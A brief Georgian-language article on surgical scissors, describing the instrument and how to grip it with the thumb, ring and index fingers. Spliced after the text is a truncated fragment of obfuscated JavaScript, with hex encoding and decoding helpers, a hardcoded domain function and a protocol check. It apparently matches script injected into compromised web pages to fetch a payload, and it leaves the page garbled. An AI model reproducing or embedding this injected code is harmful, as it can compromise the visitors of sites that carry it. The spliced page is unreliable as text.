ქირურგიული მაკრატელი

ქირურგიული მაკრატელი — ბასრად ალესილი, ქსოვილთა გასაკვეთი ქირურგიული ინსტრუმენტია. იგი შედგება ორი დეტალისაგან, რომლის პირებიც ერთმანეთის მიმართულებით მოძრაობისას კვეთავენ ქსოვილებს.
მაკრატელი უნდა დავიკაოთ მარჯვენა ხელის I და IV თითებით , საჩვენებელი თითი უნდა იმყოფებოდეს ხრახნის მახლობლად, ხოლო შუა (მესამე) თითი – რგოლსა და პირს შორის. ამ წესი საშუალებას იძლევა მაკრატელი ხელში მჭიდროდ და მყარად გვეჭიროს.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "civicsnet.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Leave a Reply